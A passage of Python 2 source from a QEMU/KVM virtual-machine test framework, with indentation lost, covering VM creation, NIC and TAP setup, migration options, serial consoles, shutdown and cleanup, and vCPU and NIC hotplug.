devices.insert(StrDev('runas', cmdline="-runas %s" % user_runas))
if params.get("enable_sga") == "yes":
devices.insert(StrDev('sga', cmdline=add_sga(devices)))
if params.get("smartcard", "no") == "yes":
sc_chardev = params.get("smartcard_chardev")
sc_id = params.get("smartcard_id")
devices.insert(StrDev('smartcard',
cmdline=add_smartcard(sc_chardev, sc_id)))
if params.get("enable_watchdog", "no") == "yes":
cmd = add_watchdog(devices,
params.get("watchdog_device_type", None),
params.get("watchdog_action", "reset"))
devices.insert(StrDev('watchdog', cmdline=cmd))
option_roms = params.get("option_roms")
if option_roms:
cmd = ""
for opt_rom in option_roms.split():
cmd += add_option_rom(devices, opt_rom)
if cmd:
devices.insert(StrDev('ROM', cmdline=cmd))
for balloon_device in params.objects("balloon"):
params_balloon = params.object_params(balloon_device)
balloon_devid = params_balloon.get("balloon_dev_devid")
balloon_bus = None
use_ofmt = params_balloon.get("balloon_use_old_format",
"no") == "yes"
if params_balloon.get("balloon_dev_add_bus") == "yes":
balloon_bus = _get_pci_bus(devices, params, 'balloon', True)
add_balloon(devices, devid=balloon_devid, bus=balloon_bus,
use_old_format=use_ofmt)
# Add qemu options
if params.get("msg_timestamp"):
attr_info = ["timestamp", params["msg_timestamp"], bool]
add_qemu_option(devices, "msg", [attr_info])
if params.get("realtime_mlock"):
attr_info = ["mlock", params["realtime_mlock"], bool]
add_qemu_option(devices, "realtime", [attr_info])
if params.get("keyboard_layout"):
attr_info = [None, params["keyboard_layout"], None]
add_qemu_option(devices, "k", [attr_info])
# Add disable_legacy and disable_modern options
virtio_pci_devices = ["virtio-net-pci", "virtio-blk-pci",
"virtio-scsi-pci", "virtio-balloon-pci",
"virtio-serial-pci", "virtio-rng-pci"]
for device in devices:
dev_type = device.get_param("driver")
# Currently virtio1.0 behaviour on latest RHEL.7.2/RHEL.7.3
# qemu versions is default, we don't need to specify the
# disable-legacy and disable-modern options explicitly.
set_disable_legacy = params.get("set_disable_legacy", "no")
set_disable_modern = params.get("set_disable_modern", "no")
if dev_type in virtio_pci_devices:
if set_disable_legacy == "yes":
add_disable_legacy(devices, device, dev_type)
if set_disable_modern == "yes":
add_disable_modern(devices, device, dev_type)
return devices
def _nic_tap_add_helper(self, nic):
if nic.nettype == 'macvtap':
macvtap_mode = self.params.get("macvtap_mode", "vepa")
nic.tapfds = utils_net.create_and_open_macvtap(nic.ifname,
macvtap_mode,
nic.queues,
nic.netdst,
nic.mac)
else:
nic.tapfds = utils_net.open_tap("/dev/net/tun", nic.ifname,
queues=nic.queues, vnet_hdr=True)
logging.debug("Adding VM %s NIC ifname %s to bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.nettype == 'bridge':
utils_net.add_to_bridge(nic.ifname, nic.netdst)
utils_net.bring_up_ifname(nic.ifname)
def _nic_tap_remove_helper(self, nic):
try:
if nic.nettype == 'macvtap':
logging.info("Remove macvtap ifname %s", nic.ifname)
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
else:
logging.debug("Removing VM %s NIC ifname %s from bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.tapfds:
for i in nic.tapfds.split(':'):
os.close(int(i))
if nic.vhostfds:
for i in nic.vhostfds.split(':'):
os.close(int(i))
if nic.ifname and nic.ifname not in utils_net.get_net_if():
_, br_name = utils_net.find_current_bridge(nic.ifname)
if br_name == nic.netdst:
utils_net.del_from_bridge(nic.ifname, nic.netdst)
except TypeError:
pass
def create_serial_console(self):
"""
Establish a session with the serial console.
Let's consider the first serial port as serial console.
Note: requires a version of netcat that supports -U
"""
try:
tmp_serial = self.serial_ports[0]
except IndexError:
raise virt_vm.VMConfigMissingError(self.name, "serial")
log_name = "serial-%s-%s.log" % (tmp_serial, self.name)
self.serial_console_log = os.path.join(utils_misc.get_log_file_dir(),
log_name)
self.serial_console = aexpect.ShellSession(
"nc -U %s" % self.get_serial_console_filename(tmp_serial),
auto_close=False,
output_func=utils_misc.log_line,
output_params=(log_name,),
prompt=self.params.get("shell_prompt", "[\#\$]"))
del tmp_serial
def create_virtio_console(self):
"""
Establish a session with the serial console.
"""
for port in self.virtio_ports:
if isinstance(port, qemu_virtio_port.VirtioConsole):
logfile = "serial-%s-%s.log" % (port.name, self.name)
socat_cmd = "nc -U %s" % port.hostfile
self.virtio_console = aexpect.ShellSession(
socat_cmd,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(logfile,),
prompt=self.params.get("shell_prompt", "[\#\$]"))
return
if self.virtio_ports:
logging.warning(
"No virtio console created in VM. Virtio ports: %s", self.virtio_ports)
self.virtio_console = None
def update_system_dependent_devs(self):
# Networking
devices = self.devices
params = self.params
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = self.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir,
downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = self.add_nic(**dict(nic))
# gather set values or None if unset
netdev_id = nic.get('netdev_id')
# don't force conversion add_nic()/add_net() optional
# parameter
if 'tapfds' in nic:
tapfds = nic.tapfds
else:
tapfds = ""
if 'vhostfds' in nic:
vhostfds = nic.vhostfds
else:
vhostfds = ""
ifname = nic.get('ifname')
# specify the number of MSI-X vectors that the card should
# have this option currently only affects virtio cards
net_params = {'netdev_id': netdev_id,
'vhostfd': vhostfds.split(":")[0],
'vhostfds': vhostfds,
'tapfd': tapfds.split(":")[0],
'tapfds': tapfds,
'ifname': ifname,
}
for i, (host_port, guest_port) in enumerate(redirs):
net_params["host_port%d" % i] = host_port
net_params["guest_port%d" % i] = guest_port
# TODO: Is every NIC a PCI device?
devs = devices.get_by_params({'netdev_id': netdev_id})
# TODO: Is every NIC a PCI device?
if len(devs) > 1:
logging.error("There are %d devices with netdev_id %s."
" This shouldn't happens." % (len(devs),
netdev_id))
devs[0].params.update(net_params)
def update_vga_global_default(self, params, migrate=None):
"""
Update VGA global default settings
:param params: dict for create vm
:param migrate: is vm create for migration
"""
if not self.devices:
return
vga_mapping = {'VGA-std': 'VGA',
'VGA-cirrus': 'cirrus-vga',
'VGA-qxl': 'qxl-vga',
'qxl': 'qxl',
'VGA-none': None}
for device in self.devices:
if not isinstance(device, qdevices.QStringDevice):
continue
vga_type = vga_mapping.get(device.type)
if not vga_type:
continue
help_cmd = '%s -device %s,\? 2>&1' % (self.qemu_binary, vga_type)
help_info = process.system_output(help_cmd, shell=True,
verbose=False)
for pro in re.findall(r'%s.(\w+)=' % vga_type, help_info):
key = [vga_type.lower(), pro]
if migrate:
key.append('dst')
key = '_'.join(key)
val = params.get(key)
if not val:
continue
qdev = qdevices.QGlobal(vga_type, pro, val)
self.devices.insert(qdev)
@error_context.context_aware
def create(self, name=None, params=None, root_dir=None,
timeout=120, migration_mode=None,
migration_exec_cmd=None, migration_fd=None,
mac_source=None):
"""
Start the VM by running a qemu command.
All parameters are optional. If name, params or root_dir are not
supplied, the respective values stored as class attributes are used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:param migration_mode: If supplied, start VM for incoming migration
using this protocol (either 'rdma', 'x-rdma', 'rdma', 'tcp', 'unix' or 'exec')
:param migration_exec_cmd: Command to embed in '-incoming "exec: ..."'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param migration_fd: Open descriptor from machine should migrate.
:param mac_source: A VM object from which to copy MAC addresses. If not
specified, new addresses will be generated.
:raise VMCreateError: If qemu terminates unexpectedly
:raise VMKVMInitError: If KVM initialization fails
:raise VMHugePageError: If hugepage initialization fails
:raise VMImageMissingError: If a CD image is missing
:raise VMHashMismatchError: If a CD image hash has doesn't match the
expected hash
:raise VMBadPATypeError: If an unsupported PCI assignment type is
requested
:raise VMPAError: If no PCI assignable devices could be assigned
:raise TAPCreationError: If fail to create tap fd
:raise BRAddIfError: If fail to add a tap to a bridge
:raise TAPBringUpError: If fail to bring up a tap
:raise PrivateBridgeError: If fail to bring the private bridge
"""
error_context.context("creating '%s'" % self.name)
self.destroy(free_mac_addresses=False)
if name is not None:
self.name = name
self.devices = None # Representation changed
if params is not None:
self.params = params
self.devices = None # Representation changed
if root_dir is not None:
self.root_dir = root_dir
self.devices = None # Representation changed
name = self.name
params = self.params
root_dir = self.root_dir
# Verify the md5sum of the ISO images
for cdrom in params.objects("cdroms"):
cdrom_params = params.object_params(cdrom)
if cdrom_params.get("enable_gluster") == "yes":
continue
if cdrom_params.get("enable_ceph") == "yes":
continue
iso = cdrom_params.get("cdrom")
if iso:
iso = utils_misc.get_path(data_dir.get_data_dir(), iso)
if not os.path.exists(iso):
raise virt_vm.VMImageMissingError(iso)
compare = False
if cdrom_params.get("skip_hash", "no") == "yes":
logging.debug("Skipping hash comparison")
elif cdrom_params.get("md5sum_1m"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"first MB of ISO file...")
actual_hash = crypto.hash_file(iso, 1048576,
algorithm="md5")
expected_hash = cdrom_params.get("md5sum_1m")
compare = True
elif cdrom_params.get("md5sum"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"ISO file...")
actual_hash = crypto.hash_file(iso, algorithm="md5")
expected_hash = cdrom_params.get("md5sum")
compare = True
elif cdrom_params.get("sha1sum"):
logging.debug("Comparing expected SHA1 sum with SHA1 sum "
"of ISO file...")
actual_hash = crypto.hash_file(iso, algorithm="sha1")
expected_hash = cdrom_params.get("sha1sum")
compare = True
if compare:
if actual_hash == expected_hash:
logging.debug("Hashes match")
else:
raise virt_vm.VMHashMismatchError(actual_hash,
expected_hash)
# Make sure the following code is not executed by more than one thread
# at the same time
lockfile = open(CREATE_LOCK_FILENAME, "w+")
fcntl.lockf(lockfile, fcntl.LOCK_EX)
try:
# Handle port redirections
redir_names = params.objects("redirs")
host_ports = utils_misc.find_free_ports(
5000, 6000, len(redir_names))
old_redirs = {}
if self.redirs:
old_redirs = self.redirs
self.redirs = {}
for i in range(len(redir_names)):
redir_params = params.object_params(redir_names[i])
guest_port = int(redir_params.get("guest_port"))
self.redirs[guest_port] = host_ports[i]
if self.redirs != old_redirs:
self.devices = None
# Update the network related parameters as well to conform to
# expected behavior on VM creation
getattr(self, 'virtnet').__init__(self.params,
self.name,
self.instance)
# Generate basic parameter values for all NICs and create TAP fd
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
pa_type = nic_params.get("pci_assignable")
if pa_type and pa_type != "no":
device_driver = nic_params.get("device_driver",
"pci-assign")
if "mac" not in nic:
self.virtnet.generate_mac_address(nic["nic_name"])
mac = nic["mac"]
if self.pci_assignable is None:
self.pci_assignable = test_setup.PciAssignable(
driver=params.get("driver"),
driver_option=params.get("driver_option"),
host_set_flag=params.get("host_setup_flag"),
kvm_params=params.get("kvm_default"),
vf_filter_re=params.get("vf_filter_re"),
pf_filter_re=params.get("pf_filter_re"),
device_driver=device_driver,
nic_name_re=params.get("nic_name_re"))
# Virtual Functions (VF) assignable devices
if pa_type == "vf":
self.pci_assignable.add_device(device_type=pa_type,
mac=mac,
name=nic_params.get("device_name"))
# Physical NIC (PF) assignable devices
elif pa_type == "pf":
self.pci_assignable.add_device(device_type=pa_type,
name=nic_params.get("device_name"))
else:
raise virt_vm.VMBadPATypeError(pa_type)
else:
# fill in key values, validate nettype
# note: make_create_command() calls vm.add_nic (i.e. on a
# copy)
if nic_params.get('netdst') == 'private':
nic.netdst = (test_setup.
PrivateBridgeConfig(nic_params).brname)
nic = self.add_nic(**dict(nic)) # implied add_netdev
if mac_source:
# Will raise exception if source doesn't
# have cooresponding nic
logging.debug("Copying mac for nic %s from VM %s"
% (nic.nic_name, mac_source.name))
nic.mac = mac_source.get_mac_address(nic.nic_name)
if nic.ifname in utils_net.get_net_if():
self.virtnet.generate_ifname(nic.nic_name)
elif (utils_net.find_current_bridge(nic.ifname)[1] ==
nic.netdst):
utils_net.del_from_bridge(nic.ifname, nic.netdst)
if nic.nettype in ['bridge', 'network', 'macvtap']:
self._nic_tap_add_helper(nic)
if ((nic_params.get("vhost") in ['on',
'force',
'vhost=on']) and
(nic_params.get("enable_vhostfd", "yes") == "yes")):
vhostfds = []
for i in xrange(int(nic.queues)):
vhostfds.append(str(os.open("/dev/vhost-net",
os.O_RDWR)))
nic.vhostfds = ':'.join(vhostfds)
elif nic.nettype == 'user':
logging.info("Assuming dependencies met for "
"user mode nic %s, and ready to go"
% nic.nic_name)
# Update the fd and vhostfd for nic devices
if self.devices is not None:
for device in self.devices:
cmd = device.cmdline()
if cmd is not None and "fd=" in cmd:
new_cmd = ""
for opt in cmd.split(","):
if re.match('fd=', opt):
opt = 'fd=%s' % nic.tapfds
if re.match('vhostfd=', opt):
opt = 'vhostfd=%s' % nic.vhostfds
new_cmd += "%s," % opt
device._cmdline = new_cmd.rstrip(",")
self.virtnet.update_db()
# Find available VNC port, if needed
if params.get("display") == "vnc":
self.vnc_port = utils_misc.find_free_port(5900, 6100)
# Find random UUID if specified 'uuid = random' in config file
if params.get("uuid") == "random":
f = open("/proc/sys/kernel/random/uuid")
self.uuid = f.read().strip()
f.close()
if self.pci_assignable is not None:
self.pa_pci_ids = self.pci_assignable.request_devs()
if self.pa_pci_ids:
logging.debug("Successfully assigned devices: %s",
self.pa_pci_ids)
else:
raise virt_vm.VMPAError(pa_type)
if (name is None and params is None and root_dir is None and
self.devices is not None):
self.update_system_dependent_devs()
# Make qemu command
try:
self.devices = self.make_create_command()
self.update_vga_global_default(params, migration_mode)
logging.debug(self.devices.str_short())
logging.debug(self.devices.str_bus_short())
qemu_command = self.devices.cmdline()
except exceptions.TestSkipError:
# TestSkipErrors should be kept as-is so we generate SKIP
# results instead of bogus FAIL results
raise
except Exception:
for nic in self.virtnet:
self._nic_tap_remove_helper(nic)
utils_misc.log_last_traceback('Fail to create qemu command:')
raise virt_vm.VMStartError(self.name, 'Error occurred while '
'executing make_create_command(). '
'Check the log for traceback.')
# Add migration parameters if required
if migration_mode in ["tcp", "rdma", "x-rdma"]:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (" -incoming " + migration_mode +
":0:%d" % self.migration_port)
elif migration_mode == "unix":
self.migration_file = os.path.join(data_dir.get_tmp_dir(),
"migration-unix-%s" %
self.instance)
qemu_command += " -incoming unix:%s" % self.migration_file
elif migration_mode == "exec":
if migration_exec_cmd is None:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (' -incoming "exec:nc -l %s"' %
self.migration_port)
else:
qemu_command += (' -incoming "exec:%s"' %
migration_exec_cmd)
elif migration_mode == "fd":
qemu_command += ' -incoming "fd:%d"' % (migration_fd)
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "proxy":
proxy_helper_name = params.get("9p_proxy_binary",
"virtfs-proxy-helper")
proxy_helper_cmd = utils_misc.get_path(root_dir,
proxy_helper_name)
if not proxy_helper_cmd:
raise virt_vm.VMConfigMissingError(self.name,
"9p_proxy_binary")
p9_export_dir = params.get("9p_export_dir")
if not p9_export_dir:
raise virt_vm.VMConfigMissingError(self.name,
"9p_export_dir")
proxy_helper_cmd += " -p " + p9_export_dir
proxy_helper_cmd += " -u 0 -g 0"
p9_socket_name = params.get("9p_socket_name")
proxy_helper_cmd += " -s " + p9_socket_name
proxy_helper_cmd += " -n"
logging.info("Running Proxy Helper:\n%s", proxy_helper_cmd)
self.process = aexpect.run_tail(proxy_helper_cmd,
None,
logging.info,
"[9p proxy helper]",
auto_close=False)
else:
logging.info("Running qemu command (reformatted):\n%s",
qemu_command.replace(" -", " \\\n -"))
self.qemu_command = qemu_command
self.process = aexpect.run_tail(qemu_command,
None,
logging.info,
"[qemu output] ",
auto_close=False)
logging.info("Created qemu process with parent PID %d",
self.process.get_pid())
self.start_time = time.time()
self.start_monotonic_time = utils_misc.monotonic_time()
# test doesn't need to hold tapfd's open
for nic in self.virtnet:
if 'tapfds' in nic: # implies bridge/tap
try:
for i in nic.tapfds.split(':'):
os.close(int(i))
# qemu process retains access via open file
# remove this attribute from virtnet because
# fd numbers are not always predictable and
# vm instance must support cloning.
del nic['tapfds']
# File descriptor is already closed
except OSError:
pass
if 'vhostfds' in nic:
try:
for i in nic.vhostfds.split(':'):
os.close(int(i))
del nic['vhostfds']
except OSError:
pass
# Make sure qemu is not defunct
if self.process.is_defunct():
logging.error("Bad things happened, qemu process is defunct")
err = ("Qemu is defunct.\nQemu output:\n%s"
% self.process.get_output())
self.destroy()
raise virt_vm.VMStartError(self.name, err)
# Make sure the process was started successfully
if not self.process.is_alive():
status = self.process.get_status()
output = self.process.get_output().strip()
migration_in_course = migration_mode is not None
unknown_protocol = "unknown migration protocol" in output
if migration_in_course and unknown_protocol:
e = VMMigrateProtoUnsupportedError(migration_mode, output)
else:
e = virt_vm.VMCreateError(qemu_command, status, output)
self.destroy()
raise e
# Establish monitor connections
self.monitors = []
for m_name in params.objects("monitors"):
m_params = params.object_params(m_name)
if m_params.get("debugonly", "no") == "yes":
continue
try:
monitor = qemu_monitor.wait_for_create_monitor(self,
m_name,
m_params,
timeout)
except qemu_monitor.MonitorConnectError, detail:
logging.error(detail)
self.destroy()
raise
# Add this monitor to the list
self.monitors.append(monitor)
# Create serial ports.
for serial in params.objects("serials"):
self.serial_ports.append(serial)
# Create virtio_ports (virtio_serialports and virtio_consoles)
i = 0
self.virtio_ports = []
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
if port_params.get('virtio_port_chardev') == "spicevmc":
filename = 'dev%s' % port
else:
filename = self.get_virtio_port_filename(port)
port_name = port_params.get('virtio_port_name_prefix', None)
if port_name: # If port_name_prefix was used
port_name = port_name + str(i)
else: # Implicit name - port
port_name = port
if port_params.get('virtio_port_type') in ("console",
"virtio_console"):
self.virtio_ports.append(
qemu_virtio_port.VirtioConsole(port, port_name,
filename))
else:
self.virtio_ports.append(
qemu_virtio_port.VirtioSerial(port, port_name,
filename))
i += 1
self.create_virtio_console()
# Get the output so far, to see if we have any problems with
# KVM modules or with hugepage setup.
output = self.process.get_output()
if re.search("Could not initialize KVM", output, re.IGNORECASE):
e = virt_vm.VMKVMInitError(
qemu_command, self.process.get_output())
self.destroy()
raise e
if "alloc_mem_area" in output:
e = virt_vm.VMHugePageError(
qemu_command, self.process.get_output())
self.destroy()
raise e
logging.debug("VM appears to be alive with PID %s", self.get_pid())
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
vhost_thread_pattern = params.get("vhost_thread_pattern",
r"\w+\s+(\d+)\s.*\[vhost-%s\]")
self.vhost_threads = self.get_vhost_threads(vhost_thread_pattern)
self.create_serial_console()
for key, value in self.logs.items():
outfile = "%s-%s.log" % (key, name)
self.logsessions[key] = aexpect.Tail(
"nc -U %s" % value,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(outfile,))
self.logsessions[key].set_log_file(outfile)
if params.get("paused_after_start_vm") != "yes":
# start guest
if self.monitor.verify_status("paused"):
try:
self.monitor.cmd("cont")
except qemu_monitor.QMPCmdError, e:
if ((e.data['class'] == "MigrationExpected") and
(migration_mode is not None)):
logging.debug("Migration did not start yet...")
else:
raise e
# Update mac and IP info for assigned device
# NeedFix: Can we find another way to get guest ip?
if params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, params)
finally:
fcntl.lockf(lockfile, fcntl.LOCK_UN)
lockfile.close()
def wait_for_status(self, status, timeout, first=0.0, step=1.0, text=None):
"""
Wait until the VM status changes to specified status
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param steps: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
:return: True in case the status has changed before timeout, otherwise
return None.
"""
return utils_misc.wait_for(lambda: self.monitor.verify_status(status),
timeout, first, step, text)
def wait_until_paused(self, timeout):
"""
Wait until the VM is paused.
:param timeout: Timeout in seconds.
:return: True in case the VM is paused before timeout, otherwise
return None.
"""
return self.wait_for_status("paused", timeout)
def wait_until_dead(self, timeout, first=0.0, step=1.0):
"""
Wait until VM is dead.
:return: True if VM is dead before timeout, otherwise returns None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param steps: Time to sleep between attempts in seconds
"""
return utils_misc.wait_for(self.is_dead, timeout, first, step)
def wait_for_shutdown(self, timeout=60):
"""
Wait until guest shuts down.
Helps until the VM is shut down by the guest.
:return: True in case the VM was shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.no_shutdown:
return self.wait_until_paused(timeout)
else:
return self.wait_until_dead(timeout, 1, 1)
def graceful_shutdown(self, timeout=60):
"""
Try to gracefully shut down the VM.
:return: True if VM was successfully shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
def _shutdown_by_sendline():
try:
session.sendline(self.params.get("shutdown_command"))
if self.wait_for_shutdown(timeout):
return True
finally:
session.close()
if self.params.get("shutdown_command"):
# Try to destroy with shell command
logging.debug("Shutting down VM %s (shell)", self.name)
try:
if len(self.virtnet) > 0:
session = self.login()
else:
session = self.serial_login()
except (IndexError), e:
try:
session = self.serial_login()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
# Successfully get session by serial_login()
_shutdown_by_sendline()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
# There is no exception occurs
_shutdown_by_sendline()
def _cleanup(self, free_mac_addresses):
"""
Do cleanup works
.removes VM monitor files.
.process close
.{serial,virtio}_console close
.logsessions close
.delete tmp files
.free_mac_addresses, if needed
.delete macvtap, if needed
:param free_mac_addresses: Whether to release the VM's NICs back
to the address pool.
"""
self.monitors = []
if self.pci_assignable:
self.pci_assignable.release_devs()
self.pci_assignable = None
if self.process:
self.process.close()
self.cleanup_serial_console()
if self.logsessions:
for key in self.logsessions:
self.logsessions[key].close()
# Generate the tmp file which should be deleted.
file_list = [self.get_testlog_filename()]
file_list += qemu_monitor.get_monitor_filenames(self)
file_list += self.get_virtio_port_filenames()
file_list += self.get_serial_console_filenames()
file_list += self.logs.values()
for f in file_list:
try:
if f:
os.unlink(f)
except OSError:
pass
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
if free_mac_addresses:
for nic_index in xrange(0, len(self.virtnet)):
self.free_mac_address(nic_index)
for nic in self.virtnet:
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
elif nic.ifname and nic.ifname not in utils_net.get_net_if():
_, br_name = utils_net.find_current_bridge(nic.ifname)
if br_name == nic.netdst:
utils_net.del_from_bridge(nic.ifname, nic.netdst)
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
:param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
:param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
"""
try:
# Is it already dead?
if self.is_dead():
return
logging.debug("Destroying VM %s (PID %s)", self.name,
self.get_pid())
kill_timeout = int(self.params.get("kill_timeout", "60"))
if gracefully:
self.graceful_shutdown(kill_timeout)
if self.is_dead():
logging.debug("VM %s down (shell)", self.name)
return
else:
logging.debug("VM %s failed to go down (shell)", self.name)
if self.monitor:
# Try to finish process with a monitor command
logging.debug("Ending VM %s process (monitor)", self.name)
try:
self.monitor.quit()
except Exception, e:
logging.warn(e)
if self.is_dead():
logging.warn("VM %s down during try to kill it "
"by monitor", self.name)
return
else:
# Wait for the VM to be really dead
if self.wait_until_dead(5, 0.5, 0.5):
logging.debug("VM %s down (monitor)", self.name)
return
else:
logging.debug("VM %s failed to go down (monitor)",
self.name)
# If the VM isn't dead yet...
pid = self.process.get_pid()
logging.debug("Ending VM %s process (killing PID %s)",
self.name, pid)
utils_misc.kill_process_tree(pid, 9)
# Wait for the VM to be really dead
if utils_misc.wait_for(self.is_dead, 5, 0.5, 0.5):
logging.debug("VM %s down (process killed)", self.name)
return
# If all else fails, we've got a zombie...
logging.error("VM %s (PID %s) is a zombie!", self.name,
self.process.get_pid())
finally:
self._cleanup(free_mac_addresses)
@property
def monitor(self):
"""
Return the main monitor object, selected by the parameter main_monitor.
If main_monitor isn't defined or it refers to a nonexistent monitor,
return the first monitor.
If no monitors exist, return None.
"""
for m in self.monitors:
if m.name == self.params.get("main_monitor"):
return m
if self.monitors:
return self.monitors[0]
return None
@property
def catch_monitor(self):
"""
Return the catch monitor object, selected by the parameter
catch_monitor.
If catch_monitor isn't defined or it refers to a nonexistent monitor,
return the last monitor.
If no monitors exist, return None.
"""
for m in self.monitors:
if m.name == self.params.get("catch_monitor"):
return m
if self.monitors:
return self.monitors[-1]
return None
def get_monitors_by_type(self, mon_type):
"""
Return list of monitors of mon_type type.
:param mon_type: desired monitor type (qmp, human)
"""
return [_ for _ in self.monitors if _.protocol == mon_type]
def get_peer(self, netid):
"""
Return the peer of netdev or network deivce.
:param netid: id of netdev or device
:return: id of the peer device otherwise None
"""
o = self.monitor.info("network")
network_info = o
if isinstance(o, dict):
network_info = o.get["return"]
netdev_peer_re = self.params.get("netdev_peer_re")
if not netdev_peer_re:
default_netdev_peer_re = "\s{2,}(.*?): .*?\\\s(.*?):"
logging.warning("Missing config netdev_peer_re for VM %s, "
"using default %s", self.name,
default_netdev_peer_re)
netdev_peer_re = default_netdev_peer_re
pairs = re.findall(netdev_peer_re, network_info, re.S)
for nic, tap in pairs:
if nic == netid:
return tap
if tap == netid:
return nic
return None
def get_ifname(self, nic_index=0):
"""
Return the ifname of a bridge/tap device associated with a NIC.
:param nic_index: Index of the NIC
"""
return self.virtnet[nic_index].ifname
def get_pid(self):
"""
Return the VM's PID. If the VM is dead return None.
:note: This works under the assumption that self.process.get_pid()
:return: the PID of the parent shell process.
"""
try:
children = commands.getoutput("ps --ppid=%d -o pid=" %
self.process.get_pid()).split()
return int(children[0])
except (TypeError, IndexError, ValueError):
return None
def get_qemu_threads(self):
"""
Return the list of qemu SPIDs
:return: the list of qemu SPIDs
"""
cmd = "ls /proc/%d/task" % self.get_pid()
status, output = commands.getstatusoutput(cmd)
if status:
return []
return output.split()
def get_shell_pid(self):
"""
Return the PID of the parent shell process.
:note: This works under the assumption that self.process.get_pid()
:return: the PID of the parent shell process.
"""
return self.process.get_pid()
def get_vnc_port(self):
"""
Return self.vnc_port.
"""
return self.vnc_port
def get_vcpu_pids(self, vcpu_thread_pattern):
"""
Return the list of vcpu PIDs
:return: the list of vcpu PIDs
"""
return [int(_) for _ in re.findall(vcpu_thread_pattern,
str(self.monitor.info("cpus")))]
def get_vhost_threads(self, vhost_thread_pattern):
"""
Return the list of vhost threads PIDs
:param vhost_thread_pattern: a regex to match the vhost threads
:type vhost_thread_pattern: string
:return: a list of vhost threads PIDs
:rtype: builtin.list
"""
return [int(_) for _ in re.findall(vhost_thread_pattern %
self.get_pid(),
process.system_output("ps aux",
verbose=False))]
def get_shared_meminfo(self):
"""
Returns the VM's shared memory information.
:return: Shared memory used by VM (MB)
"""
if self.is_dead():
logging.error("Could not get shared memory info from dead VM.")
return None
filename = "/proc/%d/statm" % self.get_pid()
shm = int(open(filename).read().split()[2])
# statm stores informations in pages, translate it to MB
return shm * 4.0 / 1024
def get_spice_var(self, spice_var):
"""
Returns string value of spice variable of choice or None
:param spice_var - spice related variable 'spice_port', ...
"""
return self.spice_options.get(spice_var, None)
@error_context.context_aware
def hotplug_vcpu(self, cpu_id=None, plug_command=""):
"""
Hotplug a vcpu, if not assign the cpu_id, will use the minimum unused.
the function will use the plug_command if you assigned it, else the
function will use the command automatically generated based on the
type of monitor
:param cpu_id the cpu_id you want hotplug.
"""
vcpu_threads_count = len(self.vcpu_threads)
plug_cpu_id = cpu_id
if plug_cpu_id is None:
plug_cpu_id = vcpu_threads_count
if plug_command:
vcpu_add_cmd = plug_command % plug_cpu_id
else:
if self.monitor.protocol == 'human':
vcpu_add_cmd = "cpu_set %s online" % plug_cpu_id
elif self.monitor.protocol == 'qmp':
vcpu_add_cmd = "cpu-add id=%s" % plug_cpu_id
try:
self.monitor.verify_supported_cmd(vcpu_add_cmd.split()[0])
except qemu_monitor.MonitorNotSupportedCmdError:
raise exceptions.TestSkipError("%s monitor not support cmd '%s'" %
(self.monitor.protocol,
vcpu_add_cmd))
try:
cmd_output = self.monitor.send_args_cmd(vcpu_add_cmd)
except qemu_monitor.QMPCmdError, e:
return (False, str(e))
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
if len(self.vcpu_threads) == vcpu_threads_count + 1:
return(True, plug_cpu_id)
else:
return(False, cmd_output)
@error_context.context_aware
def hotplug_nic(self, **params):
"""
Convenience method wrapper for add_nic() and add_netdev().
:return: dict-like object containing nic's details
"""
nic_name = self.add_nic(**params)["nic_name"]
self.activate_netdev(nic_name)
self.activate_nic(nic_name)
return self.virtnet[nic_name]
@error_context.context_aware
def hotunplug_nic(self, nic_index_or_name):
"""
Convenience method wrapper for del/deactivate nic and netdev.
"""
# make sure we got a name
nic_name = self.virtnet[nic_index_or_name].nic_name
self.deactivate_nic(nic_name)
self.deactivate_netdev(nic_name)
self.del_nic(nic_name)
@error_context.context_aware
